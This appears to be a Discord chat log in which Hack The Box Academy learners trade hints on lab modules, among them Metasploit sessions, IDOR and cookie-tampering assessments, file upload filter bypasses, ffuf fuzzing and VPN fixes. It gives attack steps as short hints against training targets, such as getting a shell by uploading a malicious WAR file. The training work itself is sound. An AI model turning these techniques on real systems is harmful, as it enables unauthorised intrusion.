#modules
I solved the problem just to let you know! ahaha thank you again
@potent badger great!, np
lol...first post 😄 Doing the Linux Fundamentals module and since I've blown my 1 instance spawn for the day, I decided to use my Linux box and the OpenVPN file "academy.ovpn" but it would always bomb out with an error. I had to change "cipher AES-128-CBC" to "data-ciphers-fallback AES-128-CBC" in the ovpn file before it would let me in. Is this known?
I've never run into that issue, although most of the time i haven't needed the vpn to connect to instances
what was the error?
1 sec...I'll paste it...
"Error: negotiated cipher not allowed - AES-128-CBC not in AES-256-GCM:AES-128-GCM:CHACHA20-POLY1305"
This is the academy.ovpn file you download from the site. But without modification, it doesn't appear to work. I mean, I fixed it, I just wondered if this was a known issue
Not used OpenVPN before so that was a little adventure 🙂
not known to me, but could be worth checking if others on the forum had the issue, and if so without help, you could paste your fix with your machine specs, could be helpful
Ya, i love openvpn, its great
Sure, will do 🙂
👍
Er, could you point me towards the forum please? I don't see it listed in the FAQ
Much obliged 👍
Anyone here completed the cert ?
not yet, bout 34% done
How is it ?
the bb course? great!
Sweet, i'm in then 😄
Your word is good enough for me complete stranger from the internet haha
Lol. you'll learn a lot, they've updated some stuff since i started, so im doing a refresher through what I've done already.
great!
Guys so i connected to the htb vpn with terminal but i don't know how to disconnect from it ? Should i even disconnect from it ? If yes why and how
Ctrl C
Sudo apt install cowsay -y; Echo “Yayyyy” | cowsay
Do both of those and you should disconnect from the vpn
what if i already closed the terminal ? :< (i actually closed the terminal because i thought that if i exit the terminal it will disconnect automatically )
bash: Sudo: command not found
Show me terminal
Sudo killall openvpn also works
https://linuxjourney.com/lesson/monitor-processes-ps-command
Here is also a good resource to learn more about processes in linux : )
still dont know how to close the vpn
Do lowercase sudo
I gave you the command
👏don’t👏forget👏case👏sensitivity👏
If you do ip a do you have tun0?
UGH I do not understand what I am missing on this metasploit module. Anyone online that can help?
which section are you stuck on?
sessions and jobs question 2
you can use ||exploit/linux/http/elfinder_archive_cmd_injection|| with a 64 payload
I thought I knew what they were trying to hint at but neither exploit works
Yeah, I tried it but let me try the payload
ok I guess I just needed to choose the right payload. Now I feel dumb lol
feeling dumb is actually just the feeling of getting smarter
You would think as many modules as I have completed that I could pass a tier 0 mod without asking for help
i have completed over 400 room on tryhackme but i'm still dumb
https://academy.hackthebox.com/module/23/section/254
Can anybody check if the skills assessment for this loads for them ? I get no port
skills assessment for File Inclusion module?
works fine for me
sorry, specifically the Remote File Inclusion (RFI) page
again, still works fine for me (i use rustscan to check)
Anyone good with the find command
Need to find the number of files that have .log extension
@mighty pivot try find -type f -name '*.log' | wc -l
Ok that confirms what I was thinking, thank you
Do you also know a way to list how many installed packages are on the system? What I’ve tried is “apt list --installed | wc -l” but my answer is wrong
I was wondering if there’s duplicates I need to sort or something
hey guys, i'm new to linux, i recently downloaded the lubuntu 20.04 lxqt distro, and a few days ago, the sound stopped working, what should this bug be? I've tried several commands in the terminal and it didn't help
Search on YouTube, I remember there was one video around ubuntu sound not working properly
Or restart your machine and check if sounds are back to normal
I'm stealing this one

hi everyone, i need help on LFI module, basic bypass section
ok bro, i had searched on youtube of my language but almost none solved
sometimes you have to reinstall a couple times to get everything to work together. My most recent install on a hardware machine took 3 goes before everything worked like it should
If that doesn't do it, try a different version of the distro, and if not, a different distro
Hey hey ! I would like a sanity check for Broken Auth skills assessments if possible
can you help me bro?
can anyone who completed the file upload attack module message me please? i have a question
Module: Using MSF, chapter: "Writing and Importing Modules"
I downloaded "nagios3_command_injection.rb" and did reload_all
However, I am not able to use that module
┌──(kali㉿kali)-[~]
└─$ ls /usr/share/metasploit-framework/modules/exploits/unix/webapp | grep nagi
nagios3_command_injection.rb
nagios3_history_cgi.rb
nagios3_statuswml_ping.rb
nagios_graph_explorer.rb
msf6 > use exploit/unix/webapp/nagios3_command_injection.rb
[-] No results from search
[-] Failed to load module: exploit/unix/webapp/nagios3_command_injection
hi bro, can u help me?
sure..what do you need help with?
Hey @west canopy ! I'm doing the Footprinting Lab-Hard.
I did connect through SSH, but can't figure out how to connect to the database. (access denied errors). Can you DM me for a nudge?
Edit: solved this.
hey guys im in the ffuf module and im doing the directory fuzzing section but my scan is taking significantly longer than shown in the module
in the module, it shows the scan completed in 9 seconds while mine is taking much longer, what may I be doing wrong? i tried to up the threads to 50 as well
if you found, dir you want, just quit it
i need help on LFI module bro
i send u dm
bra
that wasnt my question...
so what?
you gave a completely unrelated answer to my question lol
my question!!
what your question?
how to hack something..
😬
for me know
what problem?
Could I get a sanity check on the Broken Authentication module, Bruteforcing Cookies section? I am able to tamper with the cookie to change roles, but I keep getting the same message (no flag). I'd appreciate bouncing ideas off someone.
Sorry thinking of another question
No worries.
Which question are you on
It's question 1. I wrote a script that works (for tampering the cookie) but I'm wondering if I'm using the wrong name. May I message you to avoid spoilers here?
Yes
I think I'm being thick or not giving the answer in the correct format for the question - I am doing the User Management part of the Linux Fundamentals module and I know my answer is correct but it's not having it
"Which option needs to be set to create a home directory for a new user using "useradd" command?"
I've tried "useradd -d", "-d", "--home-dir HOME_DIR", "useradd --home-dir HOME_DIR"
It doesn't like it 😛
Ah, no - I misunderstood the question 😄
Figured out my issue. At least the script worked. 😂
Web attacks skill assessment, I found the IDOR and can change different users passwords to log in as them, but none of the users seem to be admin. Not sure what to do here
When invoked without the -D option, the useradd command creates a new user account using the values specified on the command line plus the default values from the system.
It was actually "-m/--create-home" I misunderstood the wording of the question 😛
you can fuzz the ids in burp and find the admin
what do you think of the ice dragon browser?
I did twice the first time I only looked at usernames, second time around I scrolled real slow and happened to catch the correct username, the rest was somewhat of a breeze.
never heard of it
ask
Which module shall I do next
Recently completed hacking wordpress
I welcome suggestions

Privilege escalation modules
@polar widget which section are you stuck on?
@polar widget that depends on what you have done already
Skills assessment 2nd last question
The one which involves something around exploiting apache tomcat , as far as I remember
if you look in /etc/tomcat9 there are credentials hidden in a config file
I'll definitely look into it
No wait wait a second
That credential hunt already happened
Like we did hunt and SSHed or SUed
Switched to another user
Aaa, I had worked on that one some 15 days ago :/
i recommend footprinting
Aight 🎉
@lethal atlas I'm not sure, something similar happens on my 2019 kali image. But if i launch Metasploit from the shortcut on the toolbar , it seems ok.
metasploit uses PostgreSQL no? Checked the DB service is running?
I have this module finished. I will try helping you out when I am available
This works from the cli: - "sudo msfdb init && msfconsole"
I'm pure guessing here, but "sudo msfdb init" is obviously starting some service prior to the msfconsole - without it, the DB won't connect, so that's how the GUI version is starting some database service prior to trying to connect to it with msfconsole.
Presumably some on-the-fly postgres instance or something
it only runs on windows
nix > Windows lol
true, kek
but for those who are new to linux, it gives a headache

that can be true but after using it for awhile I prefer it. Only downside is gaming but that is changing all the time
Windows for desktop, Linux for servers. Although I did Linux exclusively for, like, 10 years and it was fine - switched to Windows for VR development (Linux VR support is still shaky)
Aha, "sudo msfdb init" ..."creates and initialises the msf database" - so reckon I was right. Must create it on the fly
still doesnt let me connect to the db.
Does "sudo msfdb init" state that it's running?
And just doing "msfconsole" gives you the not connected error from here?
no msfconsole works fine. its only when trying to use something like db_nmap that the errors appear
Yeah, cos the db instance isn't connected for some reason, won't show until you try a query. Whelp, that's all I got 🙂 Works for me, I just tried to replicate it with db_nmap query also
well it does NOT work for me
Indeed. But it will work from the UI?
not the db_nmap
nothing related to a database works. but I can use msfconsole normally
Looking for help with the Whitelist Filters section on the file upload attacks module, DM if you can lend a hand
anyone else doing the bloodhound module? ive gotten all of the last questions sorted except for the last where legit no matter what i do, i get a "no data returned from query"
wondering if anyone else ran into the issue - ive rebooted the pwnbox, verified that query should be working, but still no luck
jk, i got it sorted - if anyone has questions about it, feel free to DM
ive heard a bunch of people have issues with the bloodhound module
i got it sorted - it really wasnt that bad, save for the fact you have to use the pwnbox if your version of bloodhound isnt the same
aha
woo!
👀
yoooo that MitreAtt&ck tho 👀
first hour on htb, is the only way to get more cubes for tier 1 modules by buying them?
@blissful verge
Hi all, I just need some help with Web Attack IDOR part where mass IDOR Enumeration section
I think the fundamental modules refund your cubes, but it's never a net gain so you will eventually need to buy cubes
could someone please help me?
thanks
@coral heath what are you having trouble with? I think I just fuzzed uid's in burpsuite until i found the flag
fuzzed uid to 20 but not showing any documents..
so not sure if the parameter is correct
It's a number less than 20
Yes did. Just wondering if I can PM you...?
Could someone point me in the right direction on the broken authentication skill assessment? ive figured out how the cookies are encoded and enumerated a couple of accounts and can access them through changing the cookies, but i dont know where to go from here
and of course i got it immediately after
sure
Guyssss
Hey
Need you asap. I’m in module of privileged groups. Just entered the root user but cannot find the flag. It says that I need to check the users special privileges but I cannot perform sudo -l inside ssh…
?
Sorry, which module/section do you need help with?
Hello. I need help with the "Using Metasploit Framework" module. The questions is "Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer." I've run the exploit but no session is created so how can I go about finding the flag? Please DM me if you can help. Thank you!

I'm hoping someone can help me out with the Broken Authentication Skills Assessment.
I think I'm in the final stages but can't elevate a user to reach the admin panel. Please DM if you can help out, thank you.
Privileged groups - Linux privileged escalation
sec i will DM you
@knotty falcon were you able to get logged in as the support user? Try manipulating the cookie
Yes I did. I assumed the next step was t||o alter the support user's rememberme cookie or the sessionID ||to elevate their privs, but it never worked out. Am I on the right path or should I try something else?
@umbral yacht did you remember to set the LHOST?
how to Learn hack can someone explain me where to start in this server
enumerate more users , if you have the support role your privs its on a superior role , don't think support user have it
Could someone please help me with Web Attacks skill assessment part? I've managed to get the admin user but the only function I can see is change the password but Access denied.
I also have the token right... but still Access denied
Start here at the Academy with the Easy modules.
Good paths to get started:
https://academy.hackthebox.com/path/preview/operating-system-fundamentals
https://academy.hackthebox.com/path/preview/cracking-into-hack-the-box
You can DM me
@acoustic owl thanks brother but what are applications we used for hacking in window
@acoustic owl accept req for future doubts thanks
@surreal rain from where to take roles
It depends on what exactly you want to do.
If you want to start, you first need a good knowledge of networking and operating systems like Linux and Windows.
Only then focus on tools
In the intro to networks when it says /24 means that the first 3 octets are the same, does that mean the first digit of the first 3 numbers in an address? Like if it was 150.150.150.150 for example, the octets they reference are the “1” at the start of each number?
i Have brother very nice knowledge
This is what I’m referencing by the way “The /24 network allows computers to talk to each other as long as the first three octets of an IP Address are the same (ex: 192.168.1.xxx). “
octets reference the address in binary format
your case 150.150.150.150
150 -> 10010110 , the address
10010110.10010110.10010110.10010110
but you write on decimal cause its simple
So from the example they gave 192.168.1.xxx, is the octet the “1”?
Because that’s the only same number I see
Then your brother can enroll here in the Academy and work through all the modules
the first octet its 192 , second 168, third is 1
if you pass to binary 11000000. 10101000 . 00000001 . xxxxxxxx
Ok I see, but then why do they say as long as the addresses are the same, since they’re different?
no, an IPv4 address consists of four octets.
In the example:
192.168.111.222
1st octet: 192
2nd octet: 168
3rd octet: 111
4th octet: 222
the first 3 octets are the same , but you have 4 octets in all IPv4 addr, so what change are that 4 octet
from 192.168.1.1 to 192.168.1.255 , were address that belong to 192.168.1.0/24
Sorry I’m slow to understand this for some reason, I don’t see how 192, 168, and 111 are the same :/
I am not an admin, I can not change anything here
No, I didn't because there wasn't an option to set the LHOST. I will try it though
@languid dawn hey can you change
please don't ping everyone...
you can follow the instructions on #welcome to get your HTB account name
In the exercise "Attacking Web Applications with Ffuf", there is a question to scan subdomains to find subordinate Vhosts to 'academy.htb'. I've run the ffuf command, got a (small) number of vhosts (let's call them 'alpha', 'bravo', 'charlie' to avoid spoilers, and there may be more or less than 3). My problem is that I don't quite know what sort of answer is expected. If I enter 'alpha.academy.htb bravo.academy.htb charlie.academy.htb', I get "wrong answer". I don't want anyone to tell me the solution: but can someone indicate if my format of answer is right?
otherwise you can also just change your name to something with only ascii chars and rejoin the server 🙂
we don't accept non-ascii names here
yaya pentest module finished
k
nvm - I understand that it didn't want to list any vhost subdomains which had been previously disclosed in the instructions - only ones which had not been mentioned.
Why am I not able to connect to a target machine on academy? Im using my own computer but I have a running openvpn connection using the file I downloaded(the vpn key)
smbclient connection to failed (error nt_status_host_unreachable)
Hey guys, is there somewhere a walkthrough for SQLmap essentials ? I worked through 12 modules but I am completely stuck on this one. I dont understand what they want from me. I completed all other modules for the Basic Toolset.
Did you get this figured out, I’m working on this one right now and could use a sanity check.
make sure your exploit and target vuln with that exploit
Hey got a question about the dcsync section of the AD-enum and attacks module. Having trouble to use secretdumps
Good morning/afternoon. In the Getting Started Module, I am struggling with the privilege escalation. I can get connected to the target as user1 and I can switch to user2, but for the life of me, I can't figure out how to escalate my privilege to root. I keep seeing alot about using a privesc exploit and enumerating the target, but everything seems to need to be run from the target system and I can't figure out how to get things there to run them, due to lack of root access.
Start a web server on your system and on the target host you can download the file.
Exactly as explained in the module, section 18 Nibbles - Privilege Escalation.
hello
Awesome, I'll take a look. Thanks!
I'm not sure I understand, if that is necessary, why that section comes well after the Privilege Escalation section
You looking at that under Getting Started -> Privilege Escalation? Because it doesn't say that anywhere on mine.
I just see there is a Privilege Escalation page and a Nibbles - Privilege Escalation page.
This is what I see, but Privilege Escalation is well above the Nibbles. This is why I'm a bit confused.
Yes exactly, my mistake.
I thought you were at Nibbles.
Anyone available for a nudge on the Broken Authentication skills challenge?
You can DM me
Someone made the File Inclusion -> Automated Scanning? Somehow it doesn't work
@marble tinsel first we have to fuzz the parameter name , then we fuzz for the value. If you need help feel free to DM me 🙂
@torpid imp feel free to DM if you still need help with SQLMap 🙂
Question: Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)
||when you go on the targeted website it shows Simple Backup Plugin 2.7.10 for WordPress so i used scanner/http/wp_simple_backup_file_read on metasploit and it gave me [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed||
How can i access the information i just got after running this exploit?
Which module and which section?
Still looking for help with the Whitelist Filters section on the file upload attacks module, DM if you can lend a hand
@limpid wharf it should save the output to a file
i dont understand why mine wont save. tried setting a new file path still the same result
hi I have a question in the "File Upload Attack" course, I am at the "Blacklist Filters" section, I couldn't find the answer to the question, when i upload a file it displays the source code and won't execute it...
Can I ask someone ?
Hey guys! I finished the module Web Requests. It was all good except for the optional exercise at the last section CRUD API. Adding a new city via curl -X POST was good. But how to do the following I couldn't get - Exercise: ~Try adding a new city through the browser devtools, by using one of the Fetch POST requests you used in the previous section~. I'd appreciate your help. My head won't stop pounding until I get this.
Done, I find the solution
@hollow notch I got stuck on that for a second too, couldn't leave it alone and spent an afternoon fiddling with it
@hollow notch So you're creating a Fetch POST request, since there's no POST method on this challenge, go back one and copy/pasta that Fetch POST, then modify it for the new one
@hollow notch try deleting HTB_City and New_HTB_City, then rename a city to "Flag" and curl it
Hey! Thanks for your answer. I wanted to clarify a bit. Where should I create the request? If I do stuff in the browser via http://IP/api.php/city, I get only the GET request. As I believe, I should modify this one somehow to make it a POST request. However, I don't understand where I should add the lines with the new city. Or should I do it some other way?
@hollow notch i'll pop back real quick and see what i did
@hollow notch shoot me a DM so we don't have to clog chat
Could someone please help me with the Running SQLMap on an HTTP Request second flag in SQLMAP Essentials?
Could I have a nudge on the web proxies skill assessment?I'm pretty sure I am using the correct payload processing settings in Burp intruder
@raven cairn DM me
Hey! Could someone help me understand how to answer the questions using vHosts app.inlanefreight.local and dev.inlanefreight.local in the "Information Gathering - Active Infrastructure Identification" module?
@lyric echo you want to add them to your /etc/hosts file, and then you can curl them
ahhh ok. I will do that. Thanks!
np 🙂
did anyone finish Web Service & API Attacks - Skills Assessment? I know about the ExecuteCommand Spoofing, but the challenge said that it must be achieved through SQLi, and if i try to spoof Login SOAP action, the server hangs
Soap is the way
but i can't interact with SOAP action 'Login', the server hang on, im trying from python requests
okey, I think I already understood
If you're using the correct payload processing settings then the flag should be at the bottom of the response in the results of the Intruder attack. Also, since you're only fuzzing one character, and you're encoding it twice to get a cookie similar to the original result. The position in Burp that you're fuzzing ought to resemble what you need to fuzz, as the cookie value is added and processed as a prefix, there shouldn't be duplication in the position.
While doing HTB module "Footprinting" I'm stuck in SMB, the last question says What is the full system path of that specific share. I'm unable to find the path any hints?
@summer prism try connecting with rpcclient and then netshareenumall
np !
could anyone dm me about the Web Service & API Attacks skill assessment? im so very lost
I need a little help enumerating SMTP users, the only way i know of is using metasploit but the module hasn't discussed that method yet
@summer prism is this footprinting?
yes
I've found the username using metasploit, just curious if there's another way out
I had to use metasploit as well, smtp-user-enum was the other tool i tried and it didn't work
Hey!
So I'm connected to the academy VPN and I'm trying to scan a target from my kali. The Target IP is from Getting Started academy module and it's not working.
Am I missing anything?
If it's a docker target you probably can't ping or nmap it
or if you nmap it will only have the one port open
actually the target I got is 206.189.25.173:32212
so yep, it has a port given, and nmap doesn't accept a port as far as I know
but I have to scan it
what is it I can do please?
ohhhhh
thanks a lotttt!!!!!
i'm really new to all this.
Thanks again 😉
you're welcome 🙂
hey guys for attacking web applications with ffuf, in the GET section, how can I know the port and IP of admin.academy.htb?
i know academy.htb IP and port is the one given in the instance on the bottom section
but after finding the admin.* subdomain, not sure what its IP is so i can't save it to /etc/hosts
All vHosts use the same IP address as your target computer
so if i go to admin.academy.htb it should work right?
in my case, i have the IP of academy.htb saved in my /etc/hosts file and it works when i navigate there with the port, but when i go to admin.academy.htb:PORT it gives me an error on the webpage
Did you add admin.academy.htb to the hosts file?
no i dont know what the IP is
The same IP from the target computer
so they have same IP?
what about port?
Both are identical.
Be sure to check out the principle of vHosts
ok thanks
On penetration testing process module, post-engagement section, what does PCI DSS stands for. Why is this answer wrong?
Write out DSS only.
PCI remains abbreviated
Thanks!!
hi in Pivoting, Tunneling, and Port Forwarding module i have a problem with chisel i uploaded it tried to run it and with sudo but it give this error "./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)" i have try the --reverse but i have the same error
I modified the question in this section as I realized it appears twice in the module in similar ways. we're only human!
Hey got a question about the dcsync section of the AD-enum and attacks module. Having trouble to ssh into the host
Anyone available for a nudge on the Broken Authentication skills challenge pls?
hey i am currently doing the File Upload Module (Blacklist Filters)
Whats wrong? Some .php files get uploaded but its not a real web-shell :/ (using the SecLists web-extension.txt as a wordlist)
for this question, is this asking to get all the href links? I don't understand what the question is asking for:
"Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer."
Hello guys,
I am doing Linux Local Privilege Escalation Assessment. Even I gain root, but I cannot find flag1.txt
So how to find out flag1.txt
if you have root, it should be in the root home folder /root/
also if you know it's named flag1, you can use find, or possibly locate
0.o okay yeah that's a tad weird, maybe it's a hidden file or something, not sure on that one
Maybe try "*flag*.txt"?
Nice, it works ^^
Nice 😄 So it's because it is a hidden file
yaya
ls -a (the option a will show the hidden files).
find typically will as well but the caveat is that the leading '.' has to be captured by the regex
Is there someone completed the File Upload Module ? :/
done. Thanks for reminding me
can someone help me with password bruteforcing. I'm on the first skills assessment part.
did a brute force, it gave me a username and password, but now doesn't work
gives me a different name everytime xD
can you show me what you're returning? that doesn't sound right lol
you can dm me so there's no spoilers if you want
will do now yeah
added you
did hackthebox have some major update recently?
i remember visiting the site 2yrs ago and most things used to be paid, writeups werent available for free machines and to join you had to do a little puzzle
all that is gone now?
salted usernames!!!???
2 years pretty longtime so yes changes have been made
i THINK it has something to do with the boolean string i'm using to verify a successful logon
ah so the things i said, those are completely gone now?
is anyone around to give me a hint on the web service and api attacks skill assessment? i feel like im missing something obvious
There is free and non free machines. The VIP machines have to be paid but you'll have full access to free machines.. Im relatively new to hack the box so I have no reference for the good ol days, Though id think there's a lot more features now and there's also hack the box academy. Which has step by step courses in different cyber security subjects.
I see
Thanks for the update 👍
hack the box academy is a completely different site from hack the box. But they're complementary. Hack the box will sometimes suggest academy modules that will give you knowledge to pwn a particular box and after completing academy modules it will recommend some boxes that utilize some the skills in the course you just took.
Yeah i just saw the 3 sites a few mins ago
it seems promising
yeah i thought it was my boolean fail/success string but i don't think it's that now. i'm stuck
for sure
Still stuck here, would love if someone could point me in the right direction
You can DM me
Congrats! I'm jealous!
Thank you! Here's to hoping to exam goes well 😬
can anyone help me with this?
Module : Using Metasploit Framework
Sub : Sessions
Hello guys,
I stuck at flag4, Linux Local Escalate Privilege assessment
Any more hint?
I found another user who should have access to the admin panel but I'm not able to ||decode/re-code the support user's cookie ||to give me access as this new admin user. Is this what you're trying to do as well? Because I'm stuck at this stage.
I finished up this morning. Feel free to DM if you need help.
figured thnx
I know the external service is tomcat, but dont still get how to get password of user tomcat
tomcat version 9, I cannot find any good exploit for this
I also try default creds but cannot
ah i got it
anyone available to help me out with the brute forcing passwords skills assessment? i'm getting different usernames/passwords everytime and none of them work xD
it's always one of the first names/passwords on the list
i've got my theories and i want to hash it out with someone and avoid spoilers in this chat
could someone please help me with sqlmap essential module..?
What is the customized version of the POP3 server?, Footprinting module. I was able to get the version but HTB won't accept it
@rich mulch tomcat credentials are hidden in a log file, once we get logged in to tomcat we can upload a malicious WAR file to get another shell and ultimately reach the final flag
@summer prism try running: nmap -A --script=banner <ip address>
if anyone have done information gathering module please dm me
trying to fuzz vhost but my ffuf just outputs the whole wordlist
ffuf -w /opt/useful/SecLists/Discovery/DNS/namelist.txt -u http://inlanefreight.htb -H "Host: FUZZ.inlanefreight.htb" -fs 612
@hexed tartan did you add 'http://inlanefreight.htb/' to your /etc/hosts? If the url can't resolve it won't know where to fuzz
<ip> inlanefreight.htb so not http:// i think it should be enough
I need a little help regarding reading emails using curl, I'm stuck trying to read emails using curl
@summer prism found this https://everything.curl.dev/usingcurl/reademail, if you're trying to read emails in exchange, or gmail, or something you'll probably have to do some research on it, or check the relevant APIs for each to see if its possible
nvm, resolved
Good evening! Trying to wrap up the hashcat module in Academy, and having challenges with the Academy module, as the module was written for deprecated utils/hashcat plugins, and the new cap2hccapx will not create hashes in the necessary format, anyone familiar with how to get the hccapx format out of the cap file? 😮
there's a hashcat mod? nice!
Yep - it's not part of the free Academy stuff though... think it's Tier II
It's been really useful up to this point.. but I've been trying to get the conversion right for over an hour and a half
there is an online tool from hashcat that will do the conversion right.. .but, I want to learn how to do it offline, and the module just basically says "The tools we use are deprecated, you should use new tools"
pay to win baby! Don't know if it helps, but have you tried using John to make the hash? apparently its easier, had to make one from a zip earlier today.
If I knew how to use the tools.. I wouldn't be taking the module 😮
Well, there is hashcat tool online: https://hashcat.net/cap2hashcat/index.pl
that is working.... but i've downloaded and compiled hcxpcapngtool .. and it spits out garbage (or errors out on the same file).
I have a newer version than the one on that page too.. it would make sense if the webpage had a newer version.. but doesn't seem like most tools regress capabilities when they get updated 😛
lol. Ya sry im no help, but could be worth msging the dev team, seeing if they know a solution that fits your needs, plus you could chat them up about how their software works, etc.
maybe even write up your own tooooll?? *wink wink
The hashcat dev team... or the module developer.. would think HTB would like to make their modules up to date with working / latest tools?
if I had the skills to write my own tools.. I wouldn't be taking HTB Academy modules.. 😐
Ya they try, it's alot to keep updated, especially in the sec field
totally understand.. been in the field for a while (30 years :o) - hence why I'd like to provide feedback.. was kinda thinking this might be the dc channel to do that.. maybe not though.
really appreciate the chat though.. I thought maybe I'd get crickets in the chan anyway
lol just feeling spicy this evening or something?
so contentious. or maybe it's just my reading lol
nope, might just be your reading.. don't think i'm being spicy... or maybe I am 🤷♂️
not intentional, if so 😮
I could just use the file that the website handed me.. but I'd really like to understand how to use the tools on my own....
nope, didn't get that impression
@lethal atlas Have you figured out how to solve the Trick?
@left saddle so is the challenge using hashcat to break wpa/2 keys?
yep
they give you a pcap file.. which has a whole bunch of integrity issues it seems
but works when passing it through the online site, but not when passing it through the same util I converted.
probably likely I'm doing something wrong
but 🤷♂️
I'm trying to remember the last time i cracked a pcap, I was playing with capturing wifi packets, that whole thing, and it did the work locally, oh ya, aircrack
if the pcap is corrupted i guess it wouldnt help
yeah.. apparently there is a new hashcat mode .. so it's not 2500 anymore it's 22000
but it does a fine enough job of cracking, it might be slower than hashcat
yeah.. I've thought of using alternate tools.. it's really about learning hashcat though 😮 lol
Well, right tool right job i guess, it'll crack it locally, so thats a plus, but ya if hashcat is being a pain then that's that 😛
yeah.. I'm sure it's just me doing something wrong, hoping to learn the right way to do it though, vs. just grabbing the file that got spit out of the website.. this is probably why these modules take me so long.. I want to learn the stuff, not just get the flags.. heh
again, appreciate the chat though... i'll just keep digging at it
kk, gl with it.
figured it out! the help is pretty crappy on the file
what's the fix?
part of it was that I was having issues with my terminal emulator on my mac :P. It was only printing half of the help file.. so I was not seeing any options that made any sense.
Ahaa, well glad you figured it out
had to use the -o option to output in the file format for hashcat 22000
which seems almost obvious.. but there was no -o option in my help output 😐
so, this is what cracking passwords is like IRL anyway, you spend hours working on something, only to find you missed a single char in your format or rule. 😛
LoL
took 1 sec to crack
lol. yup, probably pretty close to reality.
took ~1.5 hours to figure out what command line to use
😆
and now.. as a reward, I get +1 cube!!! 
What i love about that though, is that it made such an impression that next time around it'll be way easier
nod that's why I wanted to know how to extract the hashes myself.. heh
hi
We can use burp suite too, works like a charm
Zap is zap ⚡
I purposely did the Burp mod twice, once in burp and once in ZAP so I had a working familiarity with both. I do like that ZAP is an open community tool
plus the Hud is cool, makes me feel like im in a cockpit or mechsuit or something
Anyone able to give me a nudge on Password Attacks: Credential Hunting in Linux?
Edit: SOLVED!
@west canopy no idea here, haven't done it yet. Guessin' its more complicated than linPEAS and gtfobin?
@west canopy or is it some kind of bruteforcing thing?
yea, bruteforcing + enumerating the file system to look for credentials
do you have a user shell? if so what're the sudo permissions? any suid root stuff?
anyone available to help out with the academy module login brute forcing: skills assessment: website? i'm on the second question
@quiet prism DM me 🙂
hey guys im in last section of the attacking web apps with ffuf module
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.academy.htb:30556/
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.4.1-dev
________________________________________________
:: Method : GET
:: URL : https://FUZZ.academy.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
:: Progress: [4989/4989] :: Job [1/1] :: 956 req/sec :: Duration: [0:00:06] :: Errors: 4989 ::
for some reason, i get all errors when i simply try to find subdomains, what am i doing wrong?
Hi guys, could someone give me a hint about COMMAND INJECTIONS-Skills Assessment?
I can't bypass ;
anyone available to help me with the file upload > type filters?
I solved it
||Don't use ; lol||
👍
hi, i've a problem with https://academy.hackthebox.com/module/35/section/227
i've updated all cities' names to flag as requested then i've deleted all cities but when i search for a city named flag, just [] output from vm
i've done a script with 2 for, one to update the name to flag and the second one to delete all cities
both operations worked fine, names were updated to flag
and all cities were deleted
I feel like an idiot in the Windows Fundamentals portion. I feel like I have no idea what is going on and I am completely lost in the Skills Assessment. Does anyone have any recommendations on a lighter approach for understanding Windows? I am comfortable with Linux and Mac, I don't have much experience with Windows. I need help. 😫
Hey anyone finished the Vulnerability Assessment module? I have completed all the questions in the Nessus Skills Assessment but stumped at the first question: "What is the name of one of the accessible SMB shares from the authenticated Windows scan? (One word)" any hint or guidance will be welcomed
Can anyone give a nudge with Bypassing other blacklisted characters?
I am not getting an error just blank responses
nevermind found it
Module : Using Metasploit Framework
Sub : Sessions
I've been stuck on this since yesterday please if someone could guide me a bit
====
Hi I cannot connect to htb-ovpn. How to solve this issue?
@rich mulch open vpn 2.6?
yes
change in which file?
if you've issue with ipv6 route
pull-filter ignore "route-ipv6"
pull-filter ignore "ifconfig-ipv6"
in your config of academy-regular
is it working ?
should I change both line 12 and 13?
add filter for ipv6 as i wrote
pull-filter ignore "route-ipv6"
pull-filter ignore "ifconfig-ipv6"
ah I got it, because I choose file ovpn protocol tcp (443)
but in the config file use proto udp
that's why I failed
btw thanks for your help. Without this, I still cannot connect
you're welcome
done thnx
getting started
Web Enumeration section
idk what to do
nothing works
and anything I try to do is full of errors
I cannot access the target http://x.x.x.x/
dm me the ss of the question @pallid breach
ok
could someone help me?
First, try to update any city's name to be 'flag'. Then, delete any city. Once done, search for a city named 'flag' to get the flag.
i've done all the requirements but when i search for the flag city, empty array
and no flag
Hey all
So on the Password Attacks Password Reuse / Default Passwords
It asks me to find some credentials for mysql
I cant find it. Any hints?
Anyone able to give a nudge on Command injections skill assessment? got the request for the payload but keep getting malicious request denied {nvm, found it}
Hi, you should try all functions of this website, then find out which one can be injected
then translate the requested action to Linux command
PASSWORD ATTACKS
what lists to use to guess the name and password at the beginning of the module? i am using top-usernames-shortlist.txt and rockyou-20.txt but something is taking too long! usually the rules say that the bust during training should not be longer than 30 minutes.
Anyone else doing AD Enumeration & Attacks Skills Assessment 2 and having an issue connecting to the attack host? I was connected, then lost connection, wouldn't let me connect back to that host so reset the target (a couple times) and reset pwnbox as well, it won't ping or connect to the generated target IP?
Anyone else connectivity issues with the Password Attacks module? (ps. I'm using the pwnbox as attacking machine)
They are currently having a vpn maintenance going on ... so that could be an issue
My dear moderators, and staff of HTB academy
For how long can we expect the maintenance work to go
So we take round off break and do other stuffs
anyone available to help me with the file upload > type filters?
@fathom bay you're looking for the magic byte for a jpeg. begins with ÿ and ends with Û
Can I message you?
Can we be notified when the VPN is working?
sure
quick fuzzing question. i need to use this string from academy it says to remove some stuff from the list, but it doesn't seem to be doing that. i've compared file paths etc and it works so i'm not sure what i'm missing
